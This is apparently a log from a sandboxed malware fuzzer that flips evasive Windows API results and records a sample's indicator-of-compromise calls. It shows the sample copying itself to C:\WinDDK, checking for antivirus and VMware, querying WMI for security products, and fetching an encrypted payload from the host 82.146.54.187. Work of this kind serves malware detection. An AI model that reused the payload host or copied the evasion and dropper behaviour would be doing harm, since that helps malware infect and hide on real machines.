 ~>  Writing to file: \\?\C:\Users\student\Desktop\server.exe
[*] New IoC Api: WriteFile @ 11B4B8C => SUPPRESSED
 ~>  Writing to file: \\?\C:\Users\student\Desktop\server.exe
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: CreateThread @ 11AD9A5
[*] Now Fuzzing Api: Process32First @ 11A9DE3 => NOTHING
[*] Now Fuzzing Api: Process32Next @ 11A9DFA => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET (SUPPRESSED)
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New Evasive API: GetCursorPos @ 11A8769 => FAIL
[*] Now Fuzzing Api: GetModuleFileNameA @ 11A8236 => RETARGET
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\Windows\360Safe\deepscan\ZhuDongFangYu.exe - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: CreateProcessA @ 11A82CC
 ~>  Process name: (null) - Command line: C:\WinDDK\WinDDK.exe - Creation flag: 0
[*] New Evasive API: FindFirstFileA @ 11A9BB1 => SUCCEED
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
	IoC APIs: CreateFileW @ 11BED95
	IoC APIs: WriteFile @ 11B4B8C
	IoC APIs: CreateThread @ 11AD9A5
	IoC APIs: CreateProcessA @ 11A82CC
[-] NZB [3057] HASH [EFC8A6F6]
[*] Run terminated at KUserTickCount: 29296
 |  
[CONFIG] Score: 3057060 - ID: 8 - Parent ID: 0 - Num API: 9 - Num post-evasive API: 4 - Born in run: 9 - Epoch: 1, Fuzzed in epoch: 0
 ↪   GetModuleFileNameA 98097 11B7F31 1 1
 ↪   CPUID 79119 11B350F 0 0
 ↪   CreateFileW 126357 11BED95 1 7
 ↪   TimeQueryAPIs 57177 11ADF59 7 0
 ↪   CreateMutexA 35811 11A8BE3 1 36
 ↪   Process32First 40419 11A9DE3 0 0
 ↪   Process32Next 40442 11A9DFA 4 8
 ↪   Process32Next 40654 11A9ECE 4 8
 ↪   GetModuleFileNameA 33334 11A8236 1 3

[*] P2-iteration: 10 - Start-KUserTickCount: 29297
 |  GetModuleFileNameA - 98097 - 11B7F31 - 1 - 3
 |  CPUID - 79119 - 11B350F - 1 - 0
 |  CreateFileW - 126357 - 11BED95 - 1 - 10
 |  TimeQueryAPIs - 57177 - 11ADF59 - 7 - 0
 |  CreateMutexA - 35811 - 11A8BE3 - 3 - 0
 |  Process32First - 40419 - 11A9DE3 - 0 - 0
 |  Process32Next - 40442 - 11A9DFA - 4 - 9
 |  Process32Next - 40654 - 11A9ECE - 4 - 9
 |  GetModuleFileNameA - 33334 - 11A8236 - 1 - 3
[*] Now Fuzzing Api: GetModuleFileNameA @ 11B7F31 => RETARGET
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => RETARGET
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => RETARGET (SUPPRESSED)
[*] Now Fuzzing Api: CreateMutexA @ 11A8BE3 => FAIL
[*] Now Fuzzing Api: Process32First @ 11A9DE3 => NOTHING
[*] Now Fuzzing Api: Process32Next @ 11A9DFA => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET (SUPPRESSED)
[*] Now Fuzzing Api: GetModuleFileNameA @ 11A8236 => RETARGET
[*] New IoC Api: CreateProcessA @ 11A82CC
 ~>  Process name: (null) - Command line: C:\WinDDK\WinDDK.exe - Creation flag: 0
[*] New Evasive API: FindFirstFileA @ 11A9BB1 => SUCCEED
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
	IoC APIs: CreateFileW @ 11BED95
	IoC APIs: CreateProcessA @ 11A82CC
[-] NZB [2750] HASH [B587E720]
[*] Run terminated at KUserTickCount: 32906
 |  
[CONFIG] Score: 2750030 - ID: 9 - Parent ID: 0 - Num API: 9 - Num post-evasive API: 2 - Born in run: 10 - Epoch: 1, Fuzzed in epoch: 0
 ↪   GetModuleFileNameA 98097 11B7F31 1 3
 ↪   CPUID 79119 11B350F 1 0
 ↪   CreateFileW 126357 11BED95 1 10
 ↪   TimeQueryAPIs 57177 11ADF59 7 0
 ↪   CreateMutexA 35811 11A8BE3 3 0
 ↪   Process32First 40419 11A9DE3 0 0
 ↪   Process32Next 40442 11A9DFA 4 9
 ↪   Process32Next 40654 11A9ECE 4 9
 ↪   GetModuleFileNameA 33334 11A8236 1 3

[*] P2-iteration: 11 - Start-KUserTickCount: 32907
 |  GetModuleFileNameA - 98097 - 11B7F31 - 1 - 3
 |  CPUID - 79119 - 11B350F - 0 - 0
 |  CreateFileW - 126357 - 11BED95 - 3 - 0
 |  TimeQueryAPIs - 57177 - 11ADF59 - 0 - 0
 |  CreateMutexA - 35811 - 11A8BE3 - 1 - 35
 |  Process32First - 40419 - 11A9DE3 - 0 - 0
 |  Process32Next - 40442 - 11A9DFA - 4 - 10
 |  Process32Next - 40654 - 11A9ECE - 4 - 10
 |  GetModuleFileNameA - 33334 - 11A8236 - 0 - 0
[*] Now Fuzzing Api: GetModuleFileNameA @ 11B7F31 => RETARGET
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => FAIL
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 40000000 - CreationDisposition: 2
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => FAIL (SUPPRESSED)
[*] New IoC Api: CreateThread @ 11AD9A5
[*] Now Fuzzing Api: CreateMutexA @ 11A8BE3 => RETARGET
[*] Now Fuzzing Api: Process32First @ 11A9DE3 => NOTHING
[*] Now Fuzzing Api: Process32Next @ 11A9DFA => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET (SUPPRESSED)
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New Evasive API: GetCursorPos @ 11A8769 => FAIL
[*] Now Fuzzing Api: GetModuleFileNameA @ 11A8236 => NOTHING
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\Users\student\Desktop\Sandbox\1c8aaf0db310895a76eba04771d573993d76411539f8ec8d2a194820210d53b4.exe - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: CreateProcessA @ 11A82CC
 ~>  Process name: (null) - Command line: C:\WinDDK\WinDDK.exe - Creation flag: 0
[*] New Evasive API: FindFirstFileA @ 11A9BB1 => SUCCEED
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] WMI::ExecQuery with value: SELECT * FROM ANTIVIRUSPRODUCT @ 11AAB7F
[*] WMI::Get with value: DISPLAYNAME @ 11AAC18
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
	IoC APIs: CreateFileW @ 11BED95
	IoC APIs: CreateThread @ 11AD9A5
	IoC APIs: CreateProcessA @ 11A82CC
[-] NZB [2467] HASH [58C00DF6]
[*] Run terminated at KUserTickCount: 36512
 |  
[CONFIG] Score: 2467050 - ID: 10 - Parent ID: 0 - Num API: 9 - Num post-evasive API: 3 - Born in run: 11 - Epoch: 1, Fuzzed in epoch: 0
 ↪   GetModuleFileNameA 98097 11B7F31 1 3
 ↪   CPUID 79119 11B350F 0 0
 ↪   CreateFileW 126357 11BED95 3 0
 ↪   TimeQueryAPIs 57177 11ADF59 0 0
 ↪   CreateMutexA 35811 11A8BE3 1 35
 ↪   Process32First 40419 11A9DE3 0 0
 ↪   Process32Next 40442 11A9DFA 4 10
 ↪   Process32Next 40654 11A9ECE 4 10
 ↪   GetModuleFileNameA 33334 11A8236 0 0

[*] P2-iteration: 12 - Start-KUserTickCount: 36512
 |  GetModuleFileNameA - 98097 - 11B7F31 - 0 - 0
 |  CPUID - 79119 - 11B350F - 1 - 0
 |  CreateFileW - 126357 - 11BED95 - 2 - 0
 |  TimeQueryAPIs - 57177 - 11ADF59 - 0 - 0
 |  CreateMutexA - 35811 - 11A8BE3 - 1 - 35
 |  Process32First - 40419 - 11A9DE3 - 0 - 0
 |  Process32Next - 40442 - 11A9DFA - 4 - 11
 |  Process32Next - 40654 - 11A9ECE - 4 - 11
 |  GetModuleFileNameA - 33334 - 11A8236 - 1 - 6
[*] Now Fuzzing Api: GetModuleFileNameA @ 11B7F31 => NOTHING
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => SUCCEED
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => SUCCEED (SUPPRESSED)
[*] Now Fuzzing Api: CreateMutexA @ 11A8BE3 => RETARGET
[*] New IoC Api: CreateThread @ 11AD9A5
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 40000000 - CreationDisposition: 2
[*] New IoC Api: WriteFile @ 11B4B8C
 ~>  Writing to file: \\?\C:\WinDDK\tmp-0.bin
[*] New IoC Api: WriteFile @ 11B4B8C => SUPPRESSED
 ~>  Writing to file: \\?\C:\WinDDK\tmp-0.bin
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New Evasive API: GetCursorPos @ 11A8769 => FAIL
[*] Now Fuzzing Api: Process32First @ 11A9DE3 => NOTHING
[*] Now Fuzzing Api: Process32Next @ 11A9DFA => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET (SUPPRESSED)
[*] Now Fuzzing Api: GetModuleFileNameA @ 11A8236 => RETARGET
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\ProgramData\VMWareUser.exe - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: CreateProcessA @ 11A82CC
 ~>  Process name: (null) - Command line: C:\WinDDK\WinDDK.exe - Creation flag: 0
[*] New Evasive API: FindFirstFileA @ 11A9BB1 => SUCCEED
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
	IoC APIs: CreateFileW @ 11BED95
	IoC APIs: CreateThread @ 11AD9A5
	IoC APIs: WriteFile @ 11B4B8C
	IoC APIs: CreateProcessA @ 11A82CC
[-] NZB [3048] HASH [BBB804C8]
[*] Run terminated at KUserTickCount: 40116
 |  
[CONFIG] Score: 3048060 - ID: 11 - Parent ID: 0 - Num API: 9 - Num post-evasive API: 4 - Born in run: 12 - Epoch: 1, Fuzzed in epoch: 0
 ↪   GetModuleFileNameA 98097 11B7F31 0 0
 ↪   CPUID 79119 11B350F 1 0
 ↪   CreateFileW 126357 11BED95 2 0
 ↪   TimeQueryAPIs 57177 11ADF59 0 0
 ↪   CreateMutexA 35811 11A8BE3 1 35
 ↪   Process32First 40419 11A9DE3 0 0
 ↪   Process32Next 40442 11A9DFA 4 11
 ↪   Process32Next 40654 11A9ECE 4 11
 ↪   GetModuleFileNameA 33334 11A8236 1 6

[*] P2-iteration: 13 - Start-KUserTickCount: 40117
 |  GetModuleFileNameA - 98097 - 11B7F31 - 1 - 6
 |  CPUID - 79119 - 11B350F - 1 - 0
 |  CreateFileW - 126357 - 11BED95 - 1 - 12
 |  TimeQueryAPIs - 57177 - 11ADF59 - 7 - 0
 |  CreateMutexA - 35811 - 11A8BE3 - 3 - 0
 |  Process32First - 40419 - 11A9DE3 - 0 - 0
 |  Process32Next - 40442 - 11A9DFA - 4 - 12
 |  Process32Next - 40654 - 11A9ECE - 4 - 12
 |  GetModuleFileNameA - 33334 - 11A8236 - 0 - 0
[*] Now Fuzzing Api: GetModuleFileNameA @ 11B7F31 => RETARGET
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => RETARGET
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 40000000 - CreationDisposition: 2
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => RETARGET (SUPPRESSED)
[*] New IoC Api: WriteFile @ 11B4B8C
 ~>  Writing to file: \\?\C:\Users\student\Desktop\Pfuzzer-worksite\ZhuDongFangYu.exe
[*] New IoC Api: WriteFile @ 11B4B8C => SUPPRESSED
 ~>  Writing to file: \\?\C:\Users\student\Desktop\Pfuzzer-worksite\ZhuDongFangYu.exe
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: WriteFile @ 11B4B8C
 ~>  Writing to file: \\?\C:\Users\student\Desktop\Pfuzzer-worksite\ZhuDongFangYu.exe
[*] New IoC Api: WriteFile @ 11B4B8C => SUPPRESSED
 ~>  Writing to file: \\?\C:\Users\student\Desktop\Pfuzzer-worksite\ZhuDongFangYu.exe
[*] Now Fuzzing Api: Process32First @ 11A9DE3 => NOTHING
[*] Now Fuzzing Api: Process32Next @ 11A9DFA => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET (SUPPRESSED)
[*] Now Fuzzing Api: GetModuleFileNameA @ 11A8236 => NOTHING
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\Users\student\Desktop\Sandbox\1c8aaf0db310895a76eba04771d573993d76411539f8ec8d2a194820210d53b4.exe - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\WinDDK.exe - DesiredAccess: 40000000 - CreationDisposition: 2
[*] New IoC Api: CreateProcessA @ 11A82CC
 ~>  Process name: (null) - Command line: C:\WinDDK\WinDDK.exe - Creation flag: 0
[*] New Evasive API: FindFirstFileA @ 11A9BB1 => SUCCEED
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
	IoC APIs: CreateFileW @ 11BED95
	IoC APIs: WriteFile @ 11B4B8C
	IoC APIs: CreateProcessA @ 11A82CC
[-] NZB [3028] HASH [17A7000B]
[*] Run terminated at KUserTickCount: 43725
 |  
[CONFIG] Score: 3028040 - ID: 12 - Parent ID: 0 - Num API: 9 - Num post-evasive API: 3 - Born in run: 13 - Epoch: 1, Fuzzed in epoch: 0
 ↪   GetModuleFileNameA 98097 11B7F31 1 6
 ↪   CPUID 79119 11B350F 1 0
 ↪   CreateFileW 126357 11BED95 1 12
 ↪   TimeQueryAPIs 57177 11ADF59 7 0
 ↪   CreateMutexA 35811 11A8BE3 3 0
 ↪   Process32First 40419 11A9DE3 0 0
 ↪   Process32Next 40442 11A9DFA 4 12
 ↪   Process32Next 40654 11A9ECE 4 12
 ↪   GetModuleFileNameA 33334 11A8236 0 0

[*] P2-iteration: 14 - Start-KUserTickCount: 43725
 |  GetModuleFileNameA - 98097 - 11B7F31 - 0 - 0
 |  CPUID - 79119 - 11B350F - 1 - 0
 |  CreateFileW - 126357 - 11BED95 - 3 - 0
 |  TimeQueryAPIs - 57177 - 11ADF59 - 7 - 0
 |  CreateMutexA - 35811 - 11A8BE3 - 3 - 0
 |  Process32First - 40419 - 11A9DE3 - 0 - 0
 |  Process32Next - 40442 - 11A9DFA - 4 - 13
 |  Process32Next - 40654 - 11A9ECE - 4 - 13
 |  GetModuleFileNameA - 33334 - 11A8236 - 1 - 3
[*] Now Fuzzing Api: GetModuleFileNameA @ 11B7F31 => NOTHING
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => FAIL
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 40000000 - CreationDisposition: 2
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => FAIL (SUPPRESSED)
[*] Now Fuzzing Api: Process32First @ 11A9DE3 => NOTHING
[*] Now Fuzzing Api: Process32Next @ 11A9DFA => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET (SUPPRESSED)
[*] Now Fuzzing Api: GetModuleFileNameA @ 11A8236 => RETARGET
[*] New IoC Api: CreateProcessA @ 11A82CC
 ~>  Process name: (null) - Command line: C:\WinDDK\WinDDK.exe - Creation flag: 0
[*] New Evasive API: FindFirstFileA @ 11A9BB1 => SUCCEED
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: socket @ 11A773C
[*] New IoC Api: connect @ 11A7793
[*] New IoC Api: send @ 11A77C7
 ~>  Sending: GET /tools/regwrite.raum_encrypted HTTP/1.0
Host: 82.146.54.187
Cache-Control: max-age=0, no-store
User-agent: Mozilla/5.0 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)


[*] New IoC Api: socket @ 11A773C
[*] New IoC Api: connect @ 11A7793
[*] New IoC Api: send @ 11A77C7
 ~>  Sending: GET /tools/regwrite.raum_encrypted HTTP/1.0
Host: 82.146.54.187
Cache-Control: max-age=0, no-store
User-agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)


[*] New Evasive API: CreateFileA @ 11A7C99 => SUCCEED
[*] New IoC Api: CreateFileA @ 11A7C99
 ~>  File name: C:\WinDDK\backup.exe - DesiredAccess: 40000000 - CreationDisposition: 2
[*] New IoC Api: WriteFile @ 11A7CB2
 ~>  Writing to file: \\?\C:\WinDDK\backup.exe
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\backup.exe - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\backup.exe - DesiredAccess: 80000000 - CreationDisposition: 3
	IoC APIs: CreateFileW @ 11BED95
	IoC APIs: CreateProcessA @ 11A82CC
	IoC APIs: socket @ 11A773C
	IoC APIs: connect @ 11A7793
	IoC APIs: send @ 11A77C7
	IoC APIs: CreateFileA @ 11A7C99
	IoC APIs: WriteFile @ 11A7CB2
[-] NZB [2497] HASH [E5781127]
[*] Run terminated at KUserTickCount: 47329
 |  
[CONFIG] Score: 2497090 - ID: 13 - Parent ID: 0 - Num API: 9 - Num post-evasive API: 7 - Born in run: 14 - Epoch: 1, Fuzzed in epoch: 0
 ↪   GetModuleFileNameA 98097 11B7F31 0 0
 ↪   CPUID 79119 11B350F 1 0
 ↪   CreateFileW 126357 11BED95 3 0
 ↪   TimeQueryAPIs 57177 11ADF59 7 0
 ↪   CreateMutexA 35811 11A8BE3 3 0
 ↪   Process32First 40419 11A9DE3 0 0
 ↪   Process32Next 40442 11A9DFA 4 13
 ↪   Process32Next 40654 11A9ECE 4 13
 ↪   GetModuleFileNameA 33334 11A8236 1 3

[*] P2-iteration: 15 - Start-KUserTickCount: 47333
 |  GetModuleFileNameA - 98097 - 11B7F31 - 1 - 1
 |  CPUID - 79119 - 11B350F - 0 - 0
 |  CreateFileW - 126357 - 11BED95 - 2 - 0
 |  TimeQueryAPIs - 57177 - 11ADF59 - 7 - 0
 |  CreateMutexA - 35811 - 11A8BE3 - 3 - 0
 |  Process32First - 40419 - 11A9DE3 - 0 - 0
 |  Process32Next - 40442 - 11A9DFA - 4 - 14
 |  Process32Next - 40654 - 11A9ECE - 4 - 14
 |  GetModuleFileNameA - 33334 - 11A8236 - 1 - 2
[*] Now Fuzzing Api: GetModuleFileNameA @ 11B7F31 => RETARGET
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => SUCCEED
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => SUCCEED (SUPPRESSED)
[*] New IoC Api: WriteFile @ 11B4B8C
 ~>  Writing to file: \\?\C:\WinDDK\tmp-0.bin
[*] New IoC Api: WriteFile @ 11B4B8C => SUPPRESSED
 ~>  Writing to file: \\?\C:\WinDDK\tmp-0.bin
[*] Now Fuzzing Api: Process32First @ 11A9DE3 => NOTHING
[*] Now Fuzzing Api: Process32Next @ 11A9DFA => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET (SUPPRESSED)
[*] Now Fuzzing Api: GetModuleFileNameA @ 11A8236 => RETARGET
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\Windows\explorer.exe - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\WinDDK.exe - DesiredAccess: 40000000 - CreationDisposition: 2
[*] New IoC Api: WriteFile @ 11B4B8C
 ~>  Writing to file: \\?\C:\WinDDK\WinDDK.exe
[*] New IoC Api: WriteFile @ 11B4B8C => SUPPRESSED
 ~>  Writing to file: \\?\C:\WinDDK\WinDDK.exe
[*] New IoC Api: CreateProcessA @ 11A82CC
 ~>  Process name: (null) - Command line: C:\WinDDK\WinDDK.exe - Creation flag: 0
	IoC APIs: CreateFileW @ 11BED95
	IoC APIs: WriteFile @ 11B4B8C
	IoC APIs: CreateProcessA @ 11A82CC
[-] NZB [2851] HASH [7826AF40]
[*] Run terminated at KUserTickCount: 47431
 |  
[CONFIG] Score: 2851030 - ID: 14 - Parent ID: 0 - Num API: 9 - Num post-evasive API: 3 - Born in run: 15 - Epoch: 1, Fuzzed in epoch: 0
 ↪   GetModuleFileNameA 98097 11B7F31 1 1
 ↪   CPUID 79119 11B350F 0 0
 ↪   CreateFileW 126357 11BED95 2 0
 ↪   TimeQueryAPIs 57177 11ADF59 7 0
 ↪   CreateMutexA 35811 11A8BE3 3 0
 ↪   Process32First 40419 11A9DE3 0 0
 ↪   Process32Next 40442 11A9DFA 4 14
 ↪   Process32Next 40654 11A9ECE 4 14
 ↪   GetModuleFileNameA 33334 11A8236 1 2

[*] P2-iteration: 16 - Start-KUserTickCount: 47431
 |  GetModuleFileNameA - 98097 - 11B7F31 - 0 - 0
 |  CPUID - 79119 - 11B350F - 1 - 0
 |  CreateFileW - 126357 - 11BED95 - 1 - 3
 |  TimeQueryAPIs - 57177 - 11ADF59 - 7 - 0
 |  CreateMutexA - 35811 - 11A8BE3 - 1 - 35
 |  Process32First - 40419 - 11A9DE3 - 0 - 0
 |  Process32Next - 40442 - 11A9DFA - 4 - 15
 |  Process32Next - 40654 - 11A9ECE - 4 - 15
 |  GetModuleFileNameA - 33334 - 11A8236 - 1 - 3
[*] Now Fuzzing Api: GetModuleFileNameA @ 11B7F31 => NOTHING
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => RETARGET
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 40000000 - CreationDisposition: 2
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => RETARGET (SUPPRESSED)
[*] Now Fuzzing Api: CreateMutexA @ 11A8BE3 => RETARGET
[*] Now Fuzzing Api: Process32First @ 11A9DE3 => NOTHING
[*] Now Fuzzing Api: Process32Next @ 11A9DFA => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET (SUPPRESSED)
[*] Now Fuzzing Api: GetModuleFileNameA @ 11A8236 => RETARGET
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => RETARGET
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => RETARGET (SUPPRESSED)
[*] New IoC Api: CreateProcessA @ 11A82CC
 ~>  Process name: (null) - Command line: C:\WinDDK\WinDDK.exe - Creation flag: 0
	IoC APIs: CreateFileW @ 11BED95
	IoC APIs: CreateProcessA @ 11A82CC
[-] NZB [2173] HASH [754A5F09]
[*] Run terminated at KUserTickCount: 47556
 |  
[CONFIG] Score: 2173020 - ID: 15 - Parent ID: 0 - Num API: 9 - Num post-evasive API: 2 - Born in run: 16 - Epoch: 1, Fuzzed in epoch: 0
 ↪   GetModuleFileNameA 98097 11B7F31 0 0
 ↪   CPUID 79119 11B350F 1 0
 ↪   CreateFileW 126357 11BED95 1 3
 ↪   TimeQueryAPIs 57177 11ADF59 7 0
 ↪   CreateMutexA 35811 11A8BE3 1 35
 ↪   Process32First 40419 11A9DE3 0 0
 ↪   Process32Next 40442 11A9DFA 4 15
 ↪   Process32Next 40654 11A9ECE 4 15
 ↪   GetModuleFileNameA 33334 11A8236 1 3

[*] P2-iteration: 17 - Start-KUserTickCount: 47556
 |  GetModuleFileNameA - 98097 - 11B7F31 - 0 - 0
 |  CPUID - 79119 - 11B350F - 1 - 0
 |  CreateFileW - 126357 - 11BED95 - 3 - 0
 |  TimeQueryAPIs - 57177 - 11ADF59 - 7 - 0
 |  CreateMutexA - 35811 - 11A8BE3 - 2 - 0
 |  Process32First - 40419 - 11A9DE3 - 0 - 0
 |  Process32Next - 40442 - 11A9DFA - 4 - 16
 |  Process32Next - 40654 - 11A9ECE - 4 - 16
 |  GetModuleFileNameA - 33334 - 11A8236 - 1 - 6
[*] Now Fuzzing Api: GetModuleFileNameA @ 11B7F31 => NOTHING
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => FAIL
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 40000000 - CreationDisposition: 2
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => FAIL (SUPPRESSED)
[*] Now Fuzzing Api: Process32First @ 11A9DE3 => NOTHING
[*] Now Fuzzing Api: Process32Next @ 11A9DFA => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET (SUPPRESSED)
[*] Now Fuzzing Api: GetModuleFileNameA @ 11A8236 => RETARGET
[*] New IoC Api: CreateProcessA @ 11A82CC
 ~>  Process name: (null) - Command line: C:\WinDDK\WinDDK.exe - Creation flag: 0
	IoC APIs: CreateFileW @ 11BED95
